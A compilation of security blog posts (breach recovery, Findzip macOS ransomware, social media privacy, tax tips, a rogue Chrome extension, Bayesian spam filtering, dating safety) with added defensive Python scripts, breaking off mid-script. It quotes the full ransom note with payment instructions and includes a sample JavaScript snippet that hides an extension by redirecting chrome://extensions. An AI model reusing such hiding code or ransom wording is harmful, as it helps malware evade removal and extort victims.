Malwarebytes is proud to support Cybersecurity Factory, a 10-week summer program for early-stage cybersecurity companies. The program, run in collaboration with Highland Capital Partners, provides teams with a $35,000 convertible note investment, office space, and dedicated security mentorship from industry leaders at leading companies throughout the United States.
Security software startups face several unique challenges. The advantage of a new technology is hard to communicate, and can be even harder to demonstrate, to customers. Reputation is paramount, but can be damaged overnight. Sales models are rapidly evolving, and keeping up with them requires both agility and experimentation. Meanwhile, attackers are continuously trying to penetrate systems and exploit vulnerabilities, so there is a strong need for security innovation to stay ahead of them.
Cybersecurity Factory is attempting to fulfill this need by providing the support and mentoring to help teams with business and product strategy and to help them build a network of entrepreneurs and investors to identify key opportunities in the security market. During the summer, each team will work closely with our security mentors and potential customers to produce and improve a marketable prototype.
Applications are open! The early deadline is 3/6 and the program will accept applications on a rolling basis until 3/20.
If anyone has questions about Cybersecurity Factory, don’t hesitate to email the team at email@example.com.
As a leading security provider, Malwarebytes is excited to help facilitate and support new innovation in the security market to keep users and companies safe.
More companies are falling victim to cyberattacks, as a wide range of harmful software, social engineering schemes and scams threaten to compromise the personal information and online safety of their clients. With cybercrime rates on the increase every year, it is important for businesses of all sizes to have a recovery plan in place to mitigate any losses. In the unfortunate event of a data breach, these are the steps you should take to recover.
Identify and Contain the Problem
Companies commonly do not learn of a data breach or cyberattack until 200 or more days after it occurred. As soon as you become aware of a security incident, the first step is to identify and contain the problem.
Having all of the correct facts will go a long way to helping to formulate an effective response plan, and better inform your communications with customers. When identifying a data breach, ensure that you document the following:
To contain and remove the issue, your IT department should be ready to spring into action. To ensure that they are prepared for such a task, any business owner should hire a cybersecurity specialist or send their IT staff for cybersecurity training. They should be prepared to:
Large companies do not have a good track record of responding to cyberattacks in a timely manner. While they may move quickly to contain the breach, it is often months before they address the general public, or even those affected by the incident.
British mobile phone operator TalkTalk was criticized for waiting to inform customers of its data breach in 2015, and things haven’t improved over the years. In 2016, Yahoo took five months to respond to customers who had their data stolen. It is this kind of behavior that causes companies to lose customers and even sets them up to face class-action lawsuits. In fact, TalkTalk lost 101,000 customers as a direct result of its data breach.
The solution is to act quickly and ensure that you have a response plan ready long before any cybercrime has occurred. Liaise with your PR and Marketing departments to prepare communications that you can issue in the event of a data breach. It should include information about compensation and outline any steps that you’re taking to prevent future security incidents, such as implementing new cybersecurity protocols. When the time comes to distribute this information, your IT team will be involved to fill in the specific details.
One of the best examples of an effective cybercrime response is Home Depot. In 2014, the company faced a data breach that compromised the banking information of its customers. Its PR team took to social media right away, informing customers that staff were looking into the issue and working with law enforcement.
Organizations that experience a data breach lose an average of $3.97 million to customer churn. Home Depot, however, actually saw a 5.7 percent increase in net sales during the following quarter. Its proactive approach to communication certainly had a positive effect on the company's profits.
Prevent Future Breaches
In the event of a data breach, it is important that you have the right professionals on board to help your business recover. According to IBM, enlisting the help of cybersecurity experts can save millions as your company works to contain a data breach and respond to the affected parties.
Research by Ponemon Institute, LLC found that enlisting cybersecurity professionals helps drive down the cost of data breach recovery. Employing experts in online security saved companies $2.1 million per year, while hiring a high-level security manager such as a CISO saved $2 million.
Companies can also lower their defense costs by investing in online security technologies. Security intelligence systems saved companies an average of $3.7 million, while encryption technology saved companies $1.4 million per year. Using advanced firewalls saved them $2.5 million.
Tighten Up Your Legal Defense
After having their information compromised by a data breach, it is not uncommon for customers to sue the company. With Yahoo facing a class-action lawsuit in light of its recent data breach that affected over 500 million accounts, it is important for companies to prepare for the fact that they may be taken to court for allowing a hacker access to their customers’ personal information.
The Department of Justice advises business owners to form a relationship with local law enforcement offices before a cyberincident has the chance to occur. This establishes a point-of-contact in the event of a data breach, to whom you can report the crime.
Legal counsel should also be retained before any cybercrime has the chance to be committed. When doing so, business managers should ensure that their legal team has experience with cyberincident management. They should have the knowledge necessary to guide you when reporting the breach to customers, navigating your liability, taking corrective measures and interacting with government agencies. As this is an emerging legal issue, your legal team should stay up-to-date with the latest developments so they are prepared to handle any situation.
In the event of a data breach, companies can avoid lawsuits by taking proactive measures to take care of customers. Some companies, like Neiman Marcus, have offered victims credit monitoring services, which not only demonstrates great customer service but also weakens claims that customers may make about having suffered harm as a result of the data breach.
The best defense is a good offense, so companies should be proactive in preventing cyberattacks from occurring in the first place. Since 66 percent of data breaches are caused by employee negligence, business owners should take measures to reduce the risk of insider threats. As such, all staff members should be trained in cybersecurity best practices.
Being prepared and acting quickly are vital to helping your company recover from a cyberattack as effectively as possible. Your customers will appreciate that you’ve taken action promptly to protect them, which goes a long way to maintaining a successful and profitable business in light of a data breach.
Author Bio: Faith is a technology blogger for Secure Thoughts, a leading resource on cybersecurity. With a background in marketing, she specializes in helping businesses engage in effective communication in the event of data breaches and other cyberincidents.
February has been a relatively busy month in the world of Mac malware, and now it has gotten busier with the appearance of the second piece of ransomware ever to affect macOS. Fortunately, this is quite poor ransomware that will only bite those who are doing something wrong in the first place. Nonetheless, it’s good enough to cause your day to go bad in a very big way if you get infected.
This malware, which an update to Apple's XProtect signatures calls Findzip, was found and described by ESET. According to their report, Findzip has been found on piracy sites masquerading as cracks for Adobe Premiere Pro and Microsoft Office, although ESET was careful to point out that there may be other such files out there.
These apps are signed, but with a certificate not issued by Apple, which is unusual. Fortunately, Gatekeeper won't open them by default as a result.
Unfortunately, that protection only applies when the app has been "quarantined", meaning it carries the com.apple.quarantine extended attribute (you can see it by running xattr -l on the file in Terminal). A properly quarantine-aware app, such as any of the major web browsers, sets the quarantine flag on the files it downloads. Whenever an app or any other kind of executable file with the quarantine flag set is opened, the system will refuse to open it if it is known malware or isn't properly signed.
However, torrent clients typically do not do the right thing here, and will often leave the quarantine flag unset on the files they download. So the very people who are likely to download this malware are also the people most vulnerable to it: they will not be prevented from opening the malicious app simply because it isn't properly signed.
When opened, the malware displays a rather goofy-looking mostly-transparent window:
At this point, nothing will happen unless you click the “start” button. You can feel free to quit the app again at this point without suffering any consequences.
If you make the mistake of clicking the "start" button, the malware will begin encrypting the files in your home folder, showing a message indicating that it is patching the app (Adobe Premiere Pro or Microsoft Office) and that the process may take up to 10 minutes. Letting the process run quickly made a big mess of my desktop, which should give even the most clueless pirate some cause for concern.
The numerous README, DECRYPT, and HOW_TO_DECRYPT files all contain the same instructions:
NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption method. What do I do ? So , there are two ways you can choose: wait for a miracle or start obtaining BITCOIN NOW! , and restore YOUR DATA the easy way If You have really valuable DATA, you better NOT WASTE YOUR TIME, because there is NO other way to get your files, except make a PAYMENT FOLLOW THESE STEPS: 1) learn how to buy bitcoin https://en.bitcoin.it/wiki/Buying_Bitcoins_(the_newbie_version) 2)send 0.25 BTC to 1EZrvz1kL7SqfemkH3P1VMtomYZbfhznkb 3)send your btc address and your ip (you can get your ip here https://www.whatismyip.com) via mail to firstname.lastname@example.org 4)leave your computer on and connected to the internet for the next 24 hours after payment, your files will be unlocked. (If you can not wait 24 hours make a payment of 0.45 BTC your files will be unlocked in max 10 minutes) KEEP IN MIND THAT YOUR DECRYPTION KEY WILL NOT BE STORED ON MY SERVER FOR MORE THAN 1 WEEK SINCE YOUR FILE GET CRYPTED,THEN THERE WON'T BE ANY METHOD TO RECOVER YOUR FILES, DON'T WASTE YOUR TIME!
The encrypted files, whose names end in .crypt, are password-protected .zip archives created by calling the zip command from the shell. Every archive is given the same password, a randomly generated 25-character string. Interestingly, .crypt files are created for folders too, but they don't appear to contain the folders' contents; instead, further .crypt files are created inside the original folders. Only regular files are actually encrypted, and the originals are deleted afterwards.
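Because the output is ordinary PKZIP archives, an affected folder can be triaged without the password: each local file header carries a signature and a general-purpose flag whose bit 0 marks the entry as encrypted (per the PKWARE APPNOTE, and what Info-ZIP's zip sets when given a password). The following script is an added example, not code from the original post or from Malwarebytes; it walks a directory, separates ransom notes from .crypt files, and checks whether each .crypt is really an encrypted archive. The sample tree it builds (file names, note text, a zip whose encryption bit is flipped by hand to mimic zip -P output) is constructed for the demo.

```python
"""Triage a folder hit by Findzip-style ransomware (added example)."""
import os
import struct
import tempfile
import zipfile

RANSOM_NOTE_PREFIXES = ("README", "DECRYPT", "HOW_TO_DECRYPT")  # names from the post
ZIP_LOCAL_HEADER = b"PK\x03\x04"


def zip_entry_encrypted(path):
    """True if the first entry's encryption flag (bit 0 of the general-purpose
    flag) is set, False for a plaintext zip, None if the file is not a zip."""
    with open(path, "rb") as f:
        header = f.read(30)  # fixed-size part of a PKZIP local file header
    if len(header) < 30 or not header.startswith(ZIP_LOCAL_HEADER):
        return None
    flags = struct.unpack_from("<H", header, 6)[0]  # offset 6: general-purpose flag
    return bool(flags & 0x0001)


def triage(root):
    """Walk `root` and classify what the ransomware left behind."""
    report = {"encrypted": [], "plain_zip": [], "not_zip": [], "notes": []}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name.startswith(RANSOM_NOTE_PREFIXES):
                report["notes"].append(full)
            elif name.endswith(".crypt"):
                state = zip_entry_encrypted(full)
                key = {True: "encrypted", False: "plain_zip", None: "not_zip"}[state]
                report[key].append(full)
    return report


def build_sample_tree():
    """Constructed sample (not real victim data): one unencrypted zip, one copy
    with the encryption bit flipped to mimic `zip -P` output, one bogus .crypt
    that is not an archive, and one ransom note. Returns the directory path."""
    root = tempfile.mkdtemp(prefix="findzip-demo-")
    plain = os.path.join(root, "notes.txt.crypt")
    with zipfile.ZipFile(plain, "w") as z:
        z.writestr("notes.txt", "meeting at 10")
    with open(plain, "rb") as f:
        data = bytearray(f.read())
    data[6] |= 0x01  # set the encryption flag in the local file header
    with open(os.path.join(root, "budget.xlsx.crypt"), "wb") as f:
        f.write(data)
    with open(os.path.join(root, "photo.jpg.crypt"), "wb") as f:
        f.write(b"\xff\xd8\xff\xe0 not an archive")
    with open(os.path.join(root, "README!.txt"), "w") as f:
        f.write("All of your files were protected by a strong encryption method.")
    return root


if __name__ == "__main__":
    for kind, paths in triage(build_sample_tree()).items():
        print(f"{kind:>10}: {len(paths)}")
```

Only the local header is inspected, so the script never needs the password; a 25-character random password is out of reach for guessing anyway, which is why the post's conclusion stands: a backup is the only way back.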
Amusingly, this even applies to the malware itself! If it was run from somewhere in the user folder (like the Downloads folder or the desktop), it will have encrypted and deleted its own app bundle after running once, so it'll never run again.
Unfortunately for affected users, this ransomware is broken where "customer service" is concerned. The password used to encrypt the files is never uploaded to a command and control server, so the attacker would have no way to decrypt your files even if you paid. This is a perfect example of the danger of paying the ransom: there is never any guarantee that your payment will get your files back, and in this case it certainly won't. Once the files are encrypted, only a backup can save your data.
There has been some speculation about whether ransomware can or cannot affect a Time Machine backup. ESET reports that it will try to encrypt files found on all connected external or network volumes, so naturally I wondered if Time Machine backups might be included.
I let it loose on a dummy backup, made from my test system, and let it run for 45 minutes. Although it definitely was accessing the external drive, the backups were never damaged in any way. I was still able to restore files from the backup at the end of the test. Of course, a different kind of backup that is connected at the time the malware runs could be affected.
In all, this is not a serious threat to most people. Only those who are engaging in software piracy will encounter it, and even then there are plenty of red flags before they get to the point of actually clicking the “start” button. Unfortunately, if you do run the gauntlet and end up getting your data encrypted, and you don’t have a good backup, this malware will really ruin your day.
Malwarebytes detects this as OSX.Findzip.
Many of us are all too aware of the uptick in news stories about phishes, online scams, and customer data breaches. Social media can be a popular vector for attackers to sift through data to answer your password recovery questions, send phishes and spam, and generally be a nuisance. So we'd like to secure our profiles as much as possible, but platforms built on monetized sharing of data tend to design interfaces around…sharing your data. Oftentimes there is no obvious button to click to activate common sense security measures, which can put users off of securing their info at all. So let's plummet head first into menus, buttons, and check boxes and see how we can be a little safer when choosing to share information online.
Twitter
1. Click your profile icon in the upper right corner of the screen and click “Settings”.
2. In the left sidebar that appears, click on “Privacy and Safety”. This is where all the good stuff can be found. Scroll down to “Direct Messages”, and make sure “Receive Direct Messages from anyone” is unchecked.
3. Under “Tweet Privacy,” checking “protect my tweets” will make everything you post going forward invisible to people who don’t follow you. Further, you will be able to approve new followers on a case by case basis. If you work in advertising, this is not a great setting to have checked. But for the rest of us, it’s probably worth considering.
**BONUS SETTING** Twitter likes to stay in touch, a lot. If, perhaps, Twitter notifications start to feel a little clingy and desperate, click on “Email notifications” in the settings sidebar. Scroll down to the bottom, and you’ll see “Updates from Twitter.” (Note that Twitter has thought of many, many things to update you on. If you uncheck everything but the top option regarding product updates, your inbox should get some relief.)
Instagram
NOTE: it appears that you can only do this from a mobile device, not the desktop application.
1. Tap your profile icon in the bottom right hand corner.
2. Click the “Settings” icon in the top right hand corner.
3. Scroll to the bottom and slide the “Private Account” button on. This will make all your photos within the app private, and prompt you to approve new followers individually. However, people can still send a photo directly to you even if they’re not following you.
**BONUS SETTING** If you scroll further down to “Settings”, there is an option “Cellular Data Use.” If you switch that to on, Instagram will stop preloading videos in your feed, which might be helpful if you have a slow connection, or limited data.
LinkedIn
While the safest way to LinkedIn is always LinkedIn abstinence, some of us face peer pressure to LinkedIn before we're ready. To make sure you're practicing proper harm reduction techniques, click the "Me" button in the top right of the screen, and under "Account," choose "Privacy and settings".
Next, click the Header that says “Privacy” towards the top of the screen. The most important setting listed here is “Edit your Public Profile.” What this actually means is “Decide if search engines are allowed to index my information and display it when someone searches my name.” There are very few use cases in which such a thing would be beneficial, so the suggested answer to this is No.
The other important setting is “Sharing data with third parties,” which should almost always be No.
**BONUS SETTING** Clicking on the “Communications” header brings up settings governing how LinkedIn is allowed to contact you. If you scroll down to the very bottom, there’s an option “Partner Inmail.” You most likely do not want LinkedIn advertisers to send you direct messages, so choose No.
Quitting social media entirely can be unrealistic, or at least seriously unfun. So it’s important to take a moment to check out account settings before you start, to make absolutely sure you’re okay with the service’s default settings. (You probably should not be.) Once you’re comfortable with the security settings on your profile, tell your friends. You spent all that time digging through menus and checkboxes, and you don’t want your work undone by one of your connections, do you?
It’s everyone’s favorite time of year—tax season. While you might be looking forward to it with a mixture of trepidation and dread, cybercriminals are positively drooling at the prospect of all that personal data out there on the Internet for the taking.
So what’s the worst that can happen? In a couple words: identity theft. Nearly 250,000 new reports of identity theft were filed in 2016 with the IRS. Tax-related ID theft happens when criminals use your personal information to file for a tax refund with the IRS. Through September 2016, the IRS stopped 787,000 confirmed identity theft returns, totaling more than $4 billion. Besides having your rainy-day money stolen, this can also damage your credit and cost you in time. It can take upwards of 600 hours to restore a stolen identity, according to the Identity Theft Resource Center.
But you needn’t fear (unless you’ve been cheating on your taxes, in which case we can’t help you). In response to an uptick in tax fraud and identity theft last year, the IRS has launched new security safeguards in order to verify identity and the validity of returns, especially for those who prepare their own federal and state taxes using software programs. In addition, if you take your own proper precautions, you can shore up your online safety.
So what are some ways you can protect your information (and identity) during tax season? Here are some tried and true tips to help ease the stress.
For general tax preparedness
If you haven’t already filed, now’s the time to get a move on. “Start early, gather all your information in one place, and make sure it’s accurate,” says Mark Harris, CFO of Malwarebytes. Not only will you beat the rush, but you can ensure a faster return on your return. Mistakes, including those that can lead to identity theft, are made when you’re scrambling to dig up that charitable donation receipt from Goodwill five minutes before filing deadline.
Next, pick a preparer. Do your due diligence and check out any reviews or articles on tax software, if you plan to use it. Research online tax service providers to see how secure their systems are. Sites should have password standards, a lock-out feature that blocks users after too many unsuccessful login attempts, security questions, and email and/or text verification. If using an accountant, look for referrals. Remember that cheapest may not always be the best.
Finally, once you've filed, make sure to keep your tax returns someplace safe. If filing online, you'll receive a massive PDF that you can download to your desktop. If someone were to access your computer a year from now, all that juicy information would be theirs for the taking. So be sure to either store it in an encrypted cloud service or put it on a removable drive, such as a USB. If filing on paper, keep your taxes in a locked file cabinet or drawer.
For online security
This is important for anyone transmitting sensitive data online, whether that's shopping or filing taxes: be sure to use a connection that's secure. If on a home computer and network, use password-protected Wi-Fi and make sure the connection to the site is encrypted (the URL starts with "https" and the browser displays a small lock icon). Be sure your preparer has the same security in place. Never, ever, ever file your taxes using public Wi-Fi.
In addition, when filing taxes online (and again, this applies to any online service that requires a password), choose passwords that are long and complex. Avoid single dictionary words, use special characters, and if allowed, use spaces. We also highly recommend a password vault or manager that supports two-factor authentication.
The third pillar of Internet security (especially during tax season) is to be aware of social engineering scams, including phishing emails. A popular phishing technique is to send an email from the “IRS” that says, essentially, “We have your tax return ready and you can get your money faster if you just download this PDF!” Nope. Number one, you should never open an attachment from an email you aren’t expecting to receive. Number two, the IRS will not email you. They’ll physically mail you information, but even then, be wary. Tax scams can happen via postal mail, too.
In addition to phishing attacks, there are reports of cold callers who say, essentially, “Hey, we’re from the IRS and you owe us $10,000.” Nope. The IRS won’t call you either. If you receive an email or phone call that’s unsolicited and is looking for personal information, don’t give it. Go back and independently verify who is trying to reach you.
After mastering the basics of online security best practices, it’s a good idea to protect yourself using a little technology. Before you even start typing in your social security number, you should run at least one kind of cybersecurity scan. That way you’re sure there’s no malware on your system, such as a keylogger or spyware that can record your information without you knowing. You should also make sure your operating system, browser, and other software programs are updated—that way, you protect against malware that might exploit vulnerabilities in your computer.
Finally, if you believe there's a chance you could have been compromised, look into a credit monitoring or ID theft service. By law, you are entitled to a free copy of your credit report from the three major bureaus: Equifax, Experian, and TransUnion. In addition, there's a lesser-known fourth bureau called Innovis that you can also use. Review your reports annually and look for any suspicious activity.
Filing early, being prepared, staying vigilant online, and employing the proper security technology—if you follow these tips then you can not only keep cybercriminals from cashing in on your tax returns but also from taxing your peace of mind.
Given Google Chrome’s popularity, it is no surprise to see it being more and more targeted these days. In particular, less than reputable ad networks are contributing to the distribution of malicious Chrome extensions via very deceptive means.
In this post we look at a forced installation of such an extension that eventually leads to more adverts being force fed into Chrome. And once you spin the malvertising roulette, anything can happen…
Malvertising campaign
Google Chrome users are profiled based on the user-agent string they show whenever they visit a website. Rather than redirecting them to an exploit kit, they are often redirected to fake software updates, scams, or rogue browser extensions.
This malvertising flow (XML feed) shows how the user is redirected to a bogus site that is enticing them to install a Chrome extension.
Enticing might in fact be a euphemism, since in this case the user is given no choice other than "Add Extension to Leave", while their browser is stuck in a never-ending loop of fullscreen modes. The tricks used here are very similar to what Pieter Arntz described in his Nov. '16 blog (Forced into installing a Chrome extension).
Hidden but omnipresent
Once installed, this extension ensures it stays in hiding by using a 1×1 pixel image as its logo (note the blank space on the top right next to the Chrome menu from the animation below) and by hooking chrome://extensions and chrome://settings such that any attempt to access those is automatically redirected to chrome://apps. That makes it much more difficult for the average user to see what extensions they have, let alone uninstalling one of them.
The larger of its scripts reveals a connection to a command and control server, from which it can receive instructions on what to do next:
The perpetrators behind this extension are checking for certain keywords within the current URL and blocking/redirecting if the conditions are met. For instance, if the user tries to visit the Malwarebytes website, the browser will immediately get redirected, first to a YouTube video, and then to one of various Potentially Unwanted Programs (PUPs), get-rich-quick schemes, and various other scams.
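The two behaviours described above (a 1×1 pixel icon so nothing shows in the toolbar, and redirecting chrome://extensions and chrome://settings so the user can't reach the uninstall page) both leave traces in the unpacked extension folder. The script below is an added example, not Malwarebytes' detection logic or anything shipped with the extension: it applies three heuristics to an unpacked extension, namely icons that decode to 1×1 pixels, a permission set broad enough to intercept every request, and scripts that redirect away from the chrome:// settings pages. The sample manifest, icon and background script it generates are constructed for the demo; the permission list and the redirect pattern are assumptions about how such an extension is typically built, not facts taken from this one.

```python
"""Heuristic triage of an unpacked Chrome extension (added example)."""
import json
import os
import re
import struct
import tempfile
import zlib

SETTINGS_PAGES = re.compile(r"chrome://(extensions|settings)\b")
REDIRECT_CALL = re.compile(r"tabs\.update|redirectUrl|location\s*=")
BROAD_PERMS = {"webRequest", "webRequestBlocking", "tabs", "<all_urls>"}


def png_dimensions(data):
    """(width, height) from the IHDR chunk, or None if `data` is not a PNG."""
    if not data.startswith(b"\x89PNG\r\n\x1a\n") or data[12:16] != b"IHDR":
        return None
    return struct.unpack(">II", data[16:24])


def inspect_extension(folder):
    """Return a list of human-readable findings for one unpacked extension."""
    findings = []
    with open(os.path.join(folder, "manifest.json"), encoding="utf-8") as f:
        manifest = json.load(f)
    for size, rel in manifest.get("icons", {}).items():
        with open(os.path.join(folder, rel), "rb") as f:
            dims = png_dimensions(f.read())
        if dims == (1, 1):
            findings.append(f"icon '{rel}' declared as {size}px but is 1x1 (invisible)")
    perms = set(manifest.get("permissions", []))
    if perms & BROAD_PERMS:
        findings.append(f"broad permissions: {sorted(perms & BROAD_PERMS)}")
    for dirpath, _, files in os.walk(folder):
        for name in files:
            if not name.endswith(".js"):
                continue
            with open(os.path.join(dirpath, name), encoding="utf-8") as f:
                src = f.read()
            if SETTINGS_PAGES.search(src) and REDIRECT_CALL.search(src):
                findings.append(f"{name}: redirects away from chrome:// settings pages")
    return findings


def make_png(width, height):
    """Build a valid (all-transparent) RGBA PNG of the given size."""
    def chunk(tag, body):
        return (struct.pack(">I", len(body)) + tag + body
                + struct.pack(">I", zlib.crc32(tag + body) & 0xFFFFFFFF))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x00" * 4 * width for _ in range(height))
    return (b"\x89PNG\r\n\x1a\n" + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b""))


def build_sample_extension():
    """Constructed sample extension mimicking the hiding tricks in the post."""
    folder = tempfile.mkdtemp(prefix="ext-demo-")
    manifest = {
        "name": "Totally Legit Helper", "version": "1.0", "manifest_version": 2,
        "icons": {"128": "icon.png"},
        "permissions": ["tabs", "webRequest", "webRequestBlocking", "<all_urls>"],
        "background": {"scripts": ["bg.js"]},
    }
    with open(os.path.join(folder, "manifest.json"), "w", encoding="utf-8") as f:
        json.dump(manifest, f)
    with open(os.path.join(folder, "icon.png"), "wb") as f:
        f.write(make_png(1, 1))
    with open(os.path.join(folder, "bg.js"), "w", encoding="utf-8") as f:
        f.write('chrome.tabs.onUpdated.addListener(function (id, info, tab) {\n'
                '  if (tab.url.indexOf("chrome://extensions") === 0 ||\n'
                '      tab.url.indexOf("chrome://settings") === 0) {\n'
                '    chrome.tabs.update(id, {url: "chrome://apps"});\n'
                '  }\n});\n')
    return folder


if __name__ == "__main__":
    for finding in inspect_extension(build_sample_extension()):
        print("-", finding)
```

On a real machine, point inspect_extension at each subfolder of the profile's Extensions directory; a hit on all three heuristics together is a strong signal, while broad permissions alone are common in legitimate ad blockers and should not be flagged on their own.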
This blog post wouldn’t be complete without a tech support scam which it seems one can’t avoid these days. If the user clicked on a new tab or typed a ‘forbidden’ keyword, the redirection chain would then deliver a fake Microsoft warning.
Google Chrome extensions are very powerful programs which are extremely useful in extending the browser’s capabilities, but can also be used for malicious purposes. Unfortunately, it is way too easy for online crooks to trick people into installing their malicious extension.
If you ever visit family or friends who run Chrome or own a Chromebook, check the installed extensions on their machines, and you'll be surprised by how many shady or flat-out fraudulent ones are in there.
In addition to redirecting to bogus sites and junk offers, there are some serious privacy and security implications (Rogue Google Chrome Extension Spies On You) when an extension can read what you type and send this information to criminals.
Google has pulled this bogus extension from its store. If you already have it installed and can't get rid of it (it won't let you do it the regular way), please download Malwarebytes and run a scan. We detect and remove this one as Rogue.ForcedExtension.
IOCs
Backend server (ad fraud/malvertising):
Tech support scam:
Bayesian spam filtering is based on Bayes' theorem, a rule of probability that tells you how likely an event is given some evidence. In Bayesian filtering it is used to compute the probability that a given email is spam, given the words it contains.
The theorem is named after the statistician Rev. Thomas Bayes, who provided an equation that allows new information to update a previously calculated probability. The rule is also called the Bayes-Price rule after the mathematician Richard Price, who recognized the importance of the theorem, corrected some of Bayes' work and put the rule to use.
When dealing with spam the theorem is used to calculate a probability whether a certain message is spam based on words in the title and message, learning from messages that were identified as spam and messages that were identified as not being spam (sometimes called ham).
The objective of the learning ability is to reduce the number of false positives. As annoying as it might be to receive a spam message, it is worse to miss a message from a customer just because he used a word that triggered the filter.
Other methods often use simple scoring filters: if a message contains specific words, a few points are added to that message's score, and when it exceeds a threshold the message is regarded as spam. Not only is this a very arbitrary method, it's also a given that spammers will change their wording in response. Take for example "Viagra", a word that will surely give you a high score. As soon as spammers found that out, they switched to variations like "V!agra" and so on. A cat and mouse game that will keep you busy creating new rules.
If the filter accepts input from individual users, its precision can be improved on a per-user basis. Different users attract specific forms of spam based on their online activities, and what is spam to one person is a "must-read" newsletter to the next. Every time the user confirms or denies that a message is spam, the filter can calculate a more refined probability for the next occasion.
A downside of Bayesian filtering, especially against more or less targeted spam, is that spammers will pad their messages with words or whole pieces of text that lower the spam score. If such messages are repeatedly marked as spam over prolonged use, those innocent words become associated with spam and start raising the score of legitimate mail. This is called poisoning.
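To make the mechanism and the poisoning effect concrete, here is an added example (not code from the original post) of a minimal naive-Bayes filter of the kind described above: it learns per-word spam and ham probabilities from labelled messages, combines them with Bayes' rule in log space, and returns the probability that a new message is spam. The training messages are constructed, and add-one (Laplace) smoothing for unseen words is my choice, not a fixed part of the method. The demo at the end shows a spammer padding a message with the user's ham vocabulary (which slips it past the filter) and what happens to a genuine message after the user has trained on several such padded messages.

```python
"""Minimal naive-Bayes spam filter with a poisoning demo (added example)."""
import math
import re
from collections import Counter

WORD = re.compile(r"[a-z]+")


def tokenize(text):
    # Presence per message, not counts: one "viagra" counts the same as ten.
    return set(WORD.findall(text.lower()))


class BayesFilter:
    def __init__(self):
        self.spam_docs = 0
        self.ham_docs = 0
        self.spam_words = Counter()
        self.ham_words = Counter()

    def train(self, text, is_spam):
        """Update the counts with one user-labelled message."""
        words = tokenize(text)
        if is_spam:
            self.spam_docs += 1
            self.spam_words.update(words)
        else:
            self.ham_docs += 1
            self.ham_words.update(words)

    def word_probs(self, word):
        """P(word | spam) and P(word | ham), add-one smoothed so that a word
        never seen in one class still gets a small non-zero probability."""
        p_ws = (self.spam_words[word] + 1) / (self.spam_docs + 2)
        p_wh = (self.ham_words[word] + 1) / (self.ham_docs + 2)
        return p_ws, p_wh

    def spam_probability(self, text):
        """Bayes' rule, naive word independence, computed as log odds:
        log P(spam|words) - log P(ham|words) = log prior ratio + sum log likelihood ratios."""
        log_odds = math.log(self.spam_docs + 1) - math.log(self.ham_docs + 1)
        for word in tokenize(text):
            p_ws, p_wh = self.word_probs(word)
            log_odds += math.log(p_ws) - math.log(p_wh)
        return 1 / (1 + math.exp(-log_odds))


# Constructed training data.
SPAM = [
    "Buy cheap viagra now",
    "Cheap viagra deal, buy today",
    "Get rich now, claim your prize",
    "claim your lottery prize money",
]
HAM = [
    "Meeting moved to 10, bring the quarterly report",
    "Can you review the report before the meeting",
    "Lunch tomorrow? bring the invoice",
    "invoice attached for the quarterly review",
]
POISONED = "buy cheap viagra meeting report invoice quarterly"
LEGIT = "quarterly report invoice meeting"


def demo():
    f = BayesFilter()
    for m in SPAM:
        f.train(m, True)
    for m in HAM:
        f.train(m, False)
    result = {
        "spam": f.spam_probability("buy cheap viagra"),   # plain spam: high
        "ham": f.spam_probability(LEGIT),                 # plain ham: low
        "poisoned": f.spam_probability(POISONED),         # padded spam slips through
    }
    # The user keeps flagging the padded messages as spam, so the ham words
    # drift toward spam and a genuine message is now misclassified.
    for _ in range(6):
        f.train(POISONED, True)
    result["legit_after_poison"] = f.spam_probability(LEGIT)
    return result


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:>18}: {v:.3f}")
```

With this data the plain spam scores about 0.96, the genuine message about 0.01, the padded spam only 0.25 (so it gets through), and after six rounds of training on the padded messages the same genuine message scores about 0.80. That swing is the poisoning the text describes, and it is why production filters weight word evidence, cap how far a single message can move the counts, and keep per-user and global statistics separate.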
A few methods to bypass “bad word” filtering.
Bayesian filtering is a method of spam filtering that has a learning ability, although limited. Knowing how spam filters work will make it more clear how some messages get through and how you can make your own mails less prone to get caught in a spam filter.
Last week, we gave a shout out to Safer Internet Day, passed around some tips for safe(r) public Wi-Fi use, and took a deep dive into Spigot browser hijackers. We had double the trouble in Mac land, with the defense industry coming under fire from rogue downloaders, and Microsoft Office macro malware.
Stay safe, everyone!
With Valentine's Day rapidly approaching, love is in the air and so are Valentine's Day security tips blogs, of which this is one. While you dash out for a last-minute purchase of flowers and a "Happy 5th Birthday" card played as a gag because they were all out of romantic ones at the store, please keep the below tips in mind if you're browsing the aisles of popular dating sites and apps. You're probably familiar with some of them already, and many of the below are good for all manner of online activities. In no particular order…
1. Are you in my area?
Make sure the profile you set up on a dating network doesn’t have geotagging enabled, regardless of whether you created it on a website or through an app. Some dating sites base the location you initially enter to serve up a list of possible matches within a certain radius, but they don’t display the location info on your profile – get familiar with the granular controls on the dating site’s settings and make sure you understand the differences. Many mobile apps aren’t hugely clear about “which thing does what”, so if in doubt, disable a particular feature until you can be 100% sure. As a side-note, ensure you don’t have geotagging enabled on any photographs you upload – if in doubt, use a picture from a public location away from your main residence. You can also use online tools to check what EXIF information is stored in images you want to use and remove it if needed.
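The EXIF check mentioned above can be done locally instead of uploading the photo to an online tool. The script below is an added example, not code from the original post: it walks the marker segments of a JPEG, looks inside the APP1 "Exif" segment for the GPSInfo IFD pointer (tag 0x8825) that a geotagged photo carries, and rewrites the file with the whole Exif segment dropped. The sample JPEG it builds is a constructed skeleton (headers only, no pixel data) with a Make tag and a GPS pointer, enough to exercise the parser. Two caveats a practitioner should know: dropping Exif also removes the Orientation tag, so a photo shot sideways may display rotated afterwards, and location can also live in XMP (a different APP1 payload) or IPTC (APP13) blocks, which this example leaves untouched.

```python
"""Detect and strip the Exif segment (incl. GPS data) from a JPEG (added example)."""
import struct

GPS_IFD_TAG = 0x8825          # GPSInfo IFD pointer in IFD0
EXIF_PREFIX = b"Exif\x00\x00"


def segments(data):
    """Yield (marker, start, end) for each marker segment up to and including
    SOS; the entropy-coded scan data that follows SOS is not parsed."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"lost sync at offset {pos}")
        marker = data[pos + 1]
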